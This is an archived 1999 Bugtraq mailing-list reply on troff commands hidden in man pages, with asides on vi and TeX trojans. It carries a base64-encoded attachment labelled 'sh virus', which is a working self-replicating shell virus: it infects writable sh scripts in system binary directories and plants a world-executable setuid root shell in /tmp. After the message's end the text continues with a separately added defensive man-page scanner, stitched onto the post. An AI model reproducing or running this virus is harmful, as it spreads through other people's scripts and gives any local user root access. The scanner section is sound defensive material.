[11133] in bugtraq


Re: Troff dangerous.

daemon@ATHENA.MIT.EDU (Pete)
Mon Jul 26 21:57:49 1999

Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"
Content-Id: <28766.932950763.0@kizmiaz.dis.org>
Message-Id:  <199907260059.RAA28770@kizmiaz.dis.org>
Date:         Sun, 25 Jul 1999 17:59:23 -0700
Reply-To: Pete <shipley@DIS.ORG>
From: Pete <shipley@DIS.ORG>
X-To:         BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  Your message of Sun, 25 Jul 1999 17:33:37 +0200. 
              <19990725173337.A2181@hades.chaoz.org>

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <28766.932950763.1@kizmiaz.dis.org>

>On Fri, Jul 23, 1999 at 10:16:42PM +0200, Pawel Wilk wrote:
>>
>> If you want your system safe,
>> don't look as root
>> at manual page.
>
>Don't look at them _at_all_ before checking them for dangerous troff commands,
>I'd say. At the end of my message I have included the shell function I use to
>check manual pages before installing them / viewing them.
>
>What this also means is SGID man is probably not a good idea (a method that is
>used to avoid having the preformatted manual page cache, catman, directories
>world-writeable).

<RANT>
    This is not a *new* security problem; it has been known for
    decades and ranks with trojans in VI, TeX and the sh shell (I will
    attach a sh shell virus).

    I believe it was Spafford that published a worm or virus written in TeX
    but I can't locate it in my security archives at the moment.   I am sure
    someone on this list has a copy.

    Also in VI it is/was (depending on your system and which version of VI you
    have installed) possible to have arbitrary commands executed as the file
    was edited.

    I believe the syntax was

	#exec  <command>

    and it had to be one of the first five lines in the file.

    Thus you would update your warning to be:

	when root don't edit files, read man pages or print TeX documents
	or run commands.

    Also don't forget to have set messages to off so people can't bounce
    commands off your terminal's status line (aka: the "25th" line).
</RANT>

But as for your statement, I would prefer a setuid/gid man (to a dedicated
uid and gid) so that *when* your troff is compromised, it will not have the
authority to compromise your system.

------- =_aaaaaaaaaa0
Content-Type: plain/text
Content-ID: <28766.932950763.2@kizmiaz.dis.org>
Content-Description: sh virus
Content-Transfer-Encoding: base64

IyEgL2Jpbi9zaAooICAgZm9yIGkgaW4gKiAvYmluLyogL3Vzci9iaW4vKiAvdXNyL3VjYi8qIC91
c3IvbmV3LyoKICAgIGRvICBpZiBzZWQgMXEgJGkgfCBncmVwICdeIyFbICAgICAgICBdKi9iaW4v
c2gnCiAgICAgICAgdGhlbiBpZiBncmVwICdeIyBtYXJrJCcgJGkKICAgICAgICAgICAgdGhlbiA6
CiAgICAgICAgICAgIGVsc2UgdHJhcCAicm0gLWYgL3RtcC8kJCIgMCAxIDIgMTMgMTUKICAgICAg
ICAgICAgICAgIHNlZCAxcSAkaSA+IC90bXAvJCQKICAgICAgICAgICAgICAgIHNlZCAnMWQKICAg
ICAgICAgICAgICAgICAgICAvXiMgbWFyayQvcScgJDAgPj4gL3RtcC8kJAogICAgICAgICAgICAg
ICAgc2VkIDFkICRpID4+IC90bXAvJCQKICAgICAgICAgICAgICAgIGNwIC90bXAvJCQgJGkKICAg
ICAgICAgICAgZmkKICAgICAgICBmaQogICAgZG9uZQogICAgaWYgbHMgLWwgL3RtcC8kJCB8IGdy
ZXAgcm9vdAogICAgdGhlbiBybSAvdG1wL2dpZnQKICAgICAgICAgY3AgL2Jpbi9zaCAvdG1wL2dp
ZnQKICAgICAgICAgY2htb2QgNDc3NyAvdG1wL2dpZnQKICAgICAgICAgZWNobyBnaWZ0IHwgbWFp
bCByb290QGxvY2FsaG9zdAogICAgZmkKICAgIHJtIC90bXAvJCQKKSA+L2Rldi9udWxsIDI+L2Rl
di9udWxsICYKI21hcmsKCgoK

------- =_aaaaaaaaaa0--
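The quoted reply mentions a shell function for checking manual pages before installing or viewing them, but that function is not reproduced in this message. The following is an added example in the same spirit, not the poster's or the quoted author's code: a POSIX sh pre-viewing scan of man page source for troff requests that can run commands or write files. It assumes the request list is groff's "unsafe" set (sy, pi, open, opena, pso), which groff's default safer mode refuses and -U enables; the two sample pages it writes are constructed for the demonstration and are not real manual pages.

```shell
#!/bin/sh
# Added example, not code from the original post: a pre-viewing scan of man
# page source for troff requests that run commands or write files.
# Assumption: the request list is groff's "unsafe" set (sy, pi, open, opena,
# pso), which groff's default safer mode (-S) refuses and -U enables.

# check_manpage FILE
#   Prints each suspicious request line with its line number and returns 1
#   if any was found, 0 if the page looks clean.  Compressed pages are read
#   through gzip/bzip2 based on their suffix.
check_manpage() {
    file=$1
    case $file in
        *.gz)  reader="gzip -dc" ;;
        *.bz2) reader="bzip2 -dc" ;;
        *)     reader="cat" ;;
    esac
    # A request is a line whose first character is the control character
    # ('.' or the no-break form "'"), optionally followed by blanks, then the
    # request name, then end of line or a blank before its arguments.
    pat="^[.'][[:blank:]]*(sy|pi|open|opena|pso)([[:blank:]]|\$)"
    hits=$($reader "$file" | grep -n -E "$pat" || true)
    if [ -n "$hits" ]; then
        printf '%s: suspicious troff request(s):\n%s\n' "$file" "$hits"
        return 1
    fi
    return 0
}

# make_samples DIR
#   Writes two constructed pages (not real manual pages) into DIR: clean.1 is
#   harmless; bad.1 carries an inert command request written with the
#   no-break control character and leading blanks, a spelling that a naive
#   grep for "^\.sy" would miss.
make_samples() {
    dir=$1
    cat > "$dir/clean.1" <<'EOF'
.TH DEMO 1
.SH NAME
demo \- a harmless page
.SH DESCRIPTION
Nothing to see here.
EOF
    cat > "$dir/bad.1" <<'EOF'
.TH DEMO 1
.SH NAME
demo \- a page carrying a command request
'  sy echo this-line-would-run-when-formatted-unsafely
.SH DESCRIPTION
Renders like any other page.
EOF
}

# Stand-alone demonstration: scan both samples and report the result.
tmpdir=$(mktemp -d)
make_samples "$tmpdir"
for page in "$tmpdir/clean.1" "$tmpdir/bad.1"; do
    if check_manpage "$page"; then
        echo "$page: clean"
    fi
done
rm -rf "$tmpdir"
```

The scan is purely textual: it catches requests written into the page itself, including inside `.de` macro definitions, but not requests reached through a `.so` include of another file or assembled from strings at format time. It is a first filter, not containment; the dedicated, unprivileged uid/gid for man that the message recommends, together with the formatter's own safer mode, is what limits the damage when a page does slip through.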
